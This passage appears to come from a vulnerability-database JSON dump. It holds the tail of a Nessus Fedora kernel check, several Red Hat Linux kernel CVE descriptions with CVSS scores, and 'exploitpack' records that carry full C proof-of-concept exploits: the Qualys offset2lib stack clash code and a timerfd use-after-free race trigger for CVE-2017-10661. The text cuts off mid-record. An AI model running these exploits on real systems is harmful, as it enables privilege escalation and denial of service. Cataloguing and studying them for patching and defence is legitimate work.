script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"kernel-3.15.4-200.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhatcve": [{"lastseen": "2021-09-02T22:49:25", "description": "The offset2lib patch as used in the Linux Kernel contains a vulnerability that allows a PIE binary to be execve()'ed with 1GB of arguments or environmental strings then the stack occupies the address 0x80000000 and the PIE binary is mapped above 0x40000000 nullifying the protection of the offset2lib patch. This affects Linux Kernel version 4.11.5 and earlier. This is a different issue than CVE-2017-1000371. This issue appears to be limited to i386 based systems.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-19T16:19:12", "type": "redhatcve", "title": "CVE-2017-1000370", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000370", "CVE-2017-1000371"], "modified": "2020-04-08T20:39:12", "id": "RH:CVE-2017-1000370", "href": "https://access.redhat.com/security/cve/cve-2017-1000370", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-02T22:53:17", "description": "The __get_user_asm_ex macro in arch/x86/include/asm/uaccess.h in the Linux kernel before 4.7.5 does not initialize a certain integer variable, which allows local users to obtain sensitive information from kernel stack memory by triggering failure of a get_user_ex call.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-11-04T11:17:24", "type": "redhatcve", "title": "CVE-2016-9178", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9178"], "modified": "2020-04-08T19:14:58", "id": "RH:CVE-2016-9178", "href": "https://access.redhat.com/security/cve/cve-2016-9178", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-07T16:28:17", "description": "A vulnerability was discovered in the Linux kernel that allows an attacker to escalate privileges with using a 64-bit ARM architecture. A local attacker with permission to create KVM-based virtual machines can both panic the hypervisor by triggering an illegal exception return (resulting in a DoS) and to redirect execution elsewhere within the hypervisor with full register control, instead of causing a return to the guest.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-11-04T10:01:29", "type": "redhatcve", "title": "CVE-2018-18021", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-18021"], "modified": "2023-04-06T05:19:25", "id": "RH:CVE-2018-18021", "href": "https://access.redhat.com/security/cve/cve-2018-18021", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-06-08T05:22:08", "description": "The sg_ioctl() function in 'drivers/scsi/sg.c' in the Linux kernel, from version 4.12-rc1 to 4.14-rc2, allows local users to obtain sensitive information from uninitialized kernel heap-memory locations via an SG_GET_REQUEST_TABLE ioctl call for '/dev/sg0'.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-10T13:20:38", "type": "redhatcve", "title": "CVE-2017-14991", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14991"], "modified": "2022-06-08T03:49:19", "id": "RH:CVE-2017-14991", "href": "https://access.redhat.com/security/cve/cve-2017-14991", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-01-21T00:03:20", "description": "A flaw was found in the Linux kernel's implementation of mapping ELF PIE binary loading to allow evasion of the stack-guard page protection mechanisms that intend to mitigate this behavior. This issue appears to be limited to i386 based systems.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-19T16:18:56", "type": "redhatcve", "title": "CVE-2017-1000371", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000371"], "modified": "2022-01-20T21:15:56", "id": "RH:CVE-2017-1000371", "href": "https://access.redhat.com/security/cve/cve-2017-1000371", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-02T22:50:02", "description": "The do_check function in kernel/bpf/verifier.c in the Linux kernel before 4.11.1 does not make the allow_ptr_leaks value available for restricting the output of the print_bpf_insn function, which allows local users to obtain sensitive address information via crafted bpf system calls.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-05-23T09:18:06", "type": "redhatcve", "title": "CVE-2017-9150", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9150"], "modified": "2020-04-08T19:37:34", "id": "RH:CVE-2017-9150", "href": "https://access.redhat.com/security/cve/cve-2017-9150", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-01T05:22:50", "description": "A flaw was found in the Linux kernel, before 4.16.6 where the cdrom_ioctl_media_changed function in drivers/cdrom/cdrom.c allows local attackers to use a incorrect bounds check in the CDROM driver CDROM_MEDIA_CHANGED ioctl to read out kernel memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-02-05T01:50:30", "type": "redhatcve", "title": "CVE-2018-10940", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10940"], "modified": "2023-02-01T03:09:55", "id": "RH:CVE-2018-10940", "href": "https://access.redhat.com/security/cve/cve-2018-10940", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-13T19:52:56", "description": "A race condition was found in the Linux kernel before version 4.11-rc1 in 'fs/timerfd.c' file which allows a local user to cause a kernel list corruption or use-after-free via simultaneous operations with a file descriptor which leverage improper 'might_cancel' queuing. An unprivileged local user could use this flaw to cause a denial of service of the system. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-14T08:49:02", "type": "redhatcve", "title": "CVE-2017-10661", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10661"], "modified": "2021-10-13T17:28:56", "id": "RH:CVE-2017-10661", "href": "https://access.redhat.com/security/cve/cve-2017-10661", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-07T11:11:24", "description": "The usb_destroy_configuration() function, in 'drivers/usb/core/config.c' in the USB core subsystem, in the Linux kernel through 4.14.5 does not consider the maximum number of configurations and interfaces before attempting to release resources. This allows local users to cause a denial of service, due to out-of-bounds write access, or possibly have unspecified other impact via a crafted USB device. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.\n", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-13T13:14:33", "type": "redhatcve", "title": "CVE-2017-17558", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-17558"], "modified": "2022-07-07T09:16:18", "id": "RH:CVE-2017-17558", "href": "https://access.redhat.com/security/cve/cve-2017-17558", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-02T22:52:43", "description": "The __get_user_asm_ex macro in arch/x86/include/asm/uaccess.h in the Linux kernel 4.4.22 through 4.4.28 contains extended asm statements that are incompatible with the exception table, which allows local users to obtain root access on non-SMEP platforms via a crafted application. NOTE: this vulnerability exists because of incorrect backporting of the CVE-2016-9178 patch to older kernels.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-29T09:47:31", "type": "redhatcve", "title": "CVE-2016-9644", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9178", "CVE-2016-9644"], "modified": "2020-04-08T19:28:42", "id": "RH:CVE-2016-9644", "href": "https://access.redhat.com/security/cve/cve-2016-9644", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:27", "description": "\nLinux Kernel - offset2lib Stack Clash", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-28T00:00:00", "type": "exploitpack", "title": "Linux Kernel - offset2lib Stack Clash", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000370", "CVE-2017-1000371"], "modified": "2017-06-28T00:00:00", "id": "EXPLOITPACK:85787E1ACB0587223CB78E6E35B08397", "href": "", "sourceData": "/*\n * Linux_offset2lib.c for CVE-2017-1000370 and CVE-2017-1000371\n * Copyright (C) 2017 Qualys, Inc.\n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program. If not, see <http://www.gnu.org/licenses/>.\n */\n\n#include <errno.h>\n#include <fcntl.h>\n#include <limits.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/resource.h>\n#include <sys/stat.h>\n#include <sys/time.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n#include <unistd.h>\n\n#define die() do { \\\n fprintf(stderr, \"died in %s: %u\\n\", __func__, __LINE__); \\\n exit(EXIT_FAILURE); \\\n} while (0)\n\n#define MAX_STACK_SIZE ((size_t)1<<30)\n#define MAX_ARG_STRLEN ((size_t)128<<10)\n#define MIN_ARGC 1024\n\nstatic void\nanalyze_mappings(const char * const binary)\n{\n if (!binary) die();\n if (strchr(binary, ' ')) die();\n int rval = EXIT_FAILURE;\n int dump = 0;\n\n const int fd = open(\"/proc/self/maps\", O_RDONLY);\n if (fd <= -1) die();\n\n static char buf[4096] = \" \";\n char * cp = buf;\n for (;;) {\n if (cp >= buf + sizeof(buf)) die();\n const ssize_t nr = read(fd, cp, buf + sizeof(buf) - cp);\n if (nr <= 0) {\n if (nr == 0) break;\n if (nr != -1) die();\n if (errno != EAGAIN && errno != EINTR) die();\n continue;\n }\n cp += nr;\n }\n *cp = '\\0';\n if (memchr(buf, '\\0', sizeof(buf)) != cp) die();\n\n size_t hi_bin = 0;\n size_t lo_lib = 0;\n size_t lo_heap = 0;\n size_t lo_stack = 0;\n const char * line = buf;\n for (;;) {\n char * const nl = strchr(line, '\\n');\n if (!nl) die();\n *nl = '\\0';\n\n cp = NULL;\n const size_t lo = strtoul(line, &cp, 16);\n if (cp <= line || *cp != '-') die();\n if (lo <= 0) die();\n\n line = cp + 1;\n cp = NULL;\n const size_t hi = strtoul(line, &cp, 16);\n if (cp <= line || *cp != ' ') die();\n if (hi <= lo) die();\n\n cp = strrchr(cp + 1, ' ');\n if (!cp) die();\n cp++;\n\n if (!strcmp(cp, binary)) {\n hi_bin = hi;\n if (lo == 0x08048000) {\n fprintf(stderr, \"Please recompile with -fpie -pie\\n\");\n die();\n }\n } else if (!strcmp(cp, \"[heap]\")) {\n if (!lo_heap) lo_heap = lo;\n else {\n if (lo_stack) die();\n lo_stack = lo;\n dump = 1;\n }\n } else if (!strcmp(cp, \"[stack]\")) {\n if (!lo_stack) lo_stack = lo;\n else {\n die();\n }\n } else if (*cp == '/') {\n if (!lo_lib) lo_lib = lo;\n }\n\n *nl = '\\n';\n line = nl + 1;\n if (*line == '\\0') break;\n }\n if (!hi_bin) die();\n if (!lo_lib) die();\n if (!lo_stack) {\n if (!lo_heap) die();\n lo_stack = lo_heap;\n lo_heap = 0;\n }\n\n if (hi_bin <= lo_lib && lo_lib - hi_bin <= 4096) {\n fprintf(stderr, \"CVE-2017-1000370 triggered\\n\");\n rval = EXIT_SUCCESS;\n dump = 1;\n }\n if (hi_bin <= lo_stack && lo_stack - hi_bin <= 4096) {\n fprintf(stderr, \"CVE-2017-1000371 triggered\\n\");\n rval = EXIT_SUCCESS;\n dump = 1;\n }\n if (dump) {\n const ssize_t len = strlen(buf);\n if (len <= 0) die();\n if (write(STDERR_FILENO, buf, len) != len) die();\n }\n if (close(fd)) die();\n exit(rval);\n}\n\nint\nmain(const int my_argc, const char * const my_argv[])\n{\n if (my_argc >= MIN_ARGC) {\n analyze_mappings(*my_argv);\n die();\n }\n\n size_t stack_size = MAX_STACK_SIZE;\n if (my_argc == 2) stack_size = strtoul(my_argv[1], NULL, 0);\n else if (my_argc != 1) die();\n if (stack_size > MAX_STACK_SIZE) die();\n\n static char arg[MAX_ARG_STRLEN] = \" \";\n memset(arg, ' ', sizeof(arg)-1);\n\n const size_t argc = 1 + stack_size / (sizeof(arg) + sizeof(char *));\n if (argc < MIN_ARGC) die();\n\n char ** const argv = calloc(argc + 1, sizeof(char *));\n if (!argv) die();\n\n char * const binary = realpath(*my_argv, NULL);\n if (!binary) die();\n *argv = binary;\n\n size_t i;\n for (i = 1; i < argc; i++) argv[i] = arg;\n if (i != argc) die();\n if (argv[i]) die();\n\n for (i = 1; i; i++) {\n fprintf(stderr, \"Run #%zu...\\n\", i);\n const pid_t pid = fork();\n if (pid <= -1) die();\n if (pid == 0) {\n static const struct rlimit stack_limit = { RLIM_INFINITY, RLIM_INFINITY };\n if (setrlimit(RLIMIT_STACK, &stack_limit)) die();\n execve(*argv, argv, NULL);\n die();\n }\n int status = 0;\n if (waitpid(pid, &status, WUNTRACED) != pid) die();\n if (!WIFEXITED(status)) die();\n if (WEXITSTATUS(status) == EXIT_SUCCESS) continue;\n if (WEXITSTATUS(status) != EXIT_FAILURE) die();\n }\n die();\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:29", "description": "\nLinux kernel 4.10.15 - Race Condition Privilege Escalation", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-15T00:00:00", "type": "exploitpack", "title": "Linux kernel 4.10.15 - Race Condition Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10661"], "modified": "2017-12-15T00:00:00", "id": "EXPLOITPACK:68588737FAF0ED161AC1D6A540E77231", "href": "", "sourceData": "/*\n * PoC for CVE-2017-10661, triggers UAF with KASan enabled in kernel 4.10\n */\n#include <string.h>\n#include <sys/timerfd.h>\n#include <sys/time.h>\n#include <sys/msg.h>\n#include <sys/types.h>\n#include <sys/socket.h>\n#include <sys/mman.h>\n#include <errno.h>\n#include <time.h>\n#include <netinet/ip.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <stdio.h>\n#include <stdint.h>\n#include <pthread.h>\n#define RACE_TIME 1000000\nint fd;\nint fd_dumb;\nint count=0;\n\n\nvoid* list_add_thread(void* arg){\n\n int ret;\n\n struct itimerspec new ={\n .it_interval={\n .tv_sec=100,\n .tv_nsec=100\n },\n .it_value={\n .tv_sec=100,\n .tv_nsec=100\n }\n };\n\n int i=0;\n while(i<1){\n\n ret=timerfd_settime(fd,3,&new,NULL);\n\n if(ret<0){\n perror(\"timerfd settime failed !\");\n }\n i++;\n }\n\n\n return NULL;\n}\n\nvoid* list_del_thread(void* arg){\n\n int ret;\n\n struct itimerspec new ={\n .it_interval={\n .tv_sec=100,\n .tv_nsec=100\n },\n .it_value={\n .tv_sec=100,\n .tv_nsec=100\n }\n };\n\n int i=0;\n while(i<1){\n ret=timerfd_settime(fd,1,&new,NULL);\n\n if(ret<0){\n perror(\"timerfd settime failed !\");\n }\n i++;\n }\n return NULL;\n\n}\n\nint post_race()\n{\n int ret;\n\n struct itimerspec new ={\n .it_interval={\n .tv_sec=100,\n .tv_nsec=100\n },\n .it_value={\n .tv_sec=100,\n .tv_nsec=100\n }\n };\n\n int i=0;\n\n struct timeval tv={\n .tv_sec = 120+count*2,\n .tv_usec = 100\n };\n ret=settimeofday(&tv,NULL);\n if(ret<0){\n perror(\"settimeofday\");\n }\n return 0;\n}\n\nint do_race(){\n int ret_add[2];\n int i;\n int j;\n pthread_t th[2]={0};\n\n i=0;\n while(i<RACE_TIME){\n if(i%128)\n printf(\"%d\\n\",i);\n\n\n fd=timerfd_create(CLOCK_REALTIME,0); // create the victim ctx\n if(fd<0){\n perror(\"timerfd craete failed!\");\n return -1;\n }\n ret_add[0] = pthread_create(&th[0],NULL,list_add_thread,(void*)1);\n ret_add[1] = pthread_create(&th[1],NULL,list_add_thread,(void*)2);\n\n for( j=0;j<2;j++){\n pthread_join(th[j],NULL);\n }\n\n close(fd);\n usleep(150000);\n\n i++;\n count++;\n }\n return 0;\n}\n\nint main(int argc, char const *argv[])\n{\n int ret;\n\n // add dumb ctx\n void* area;\n void* base;\n struct itimerspec new ={\n .it_interval={\n .tv_sec=100,\n .tv_nsec=100\n },\n .it_value={\n .tv_sec=100,\n .tv_nsec=100\n }\n };\n fd_dumb = timerfd_create(CLOCK_REALTIME,0);\n\n ret=timerfd_settime(fd_dumb,3,&new,NULL);\n if(ret<0){\n perror(\"timerfd settime failed !\");\n }\n\n ret=do_race();\n if(ret <0){\n puts(\"race failed!\");\n goto error_end;\n }\n\n sleep(5);\nerror_end:\n close(fd);\n exit(1);\n}", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:26", 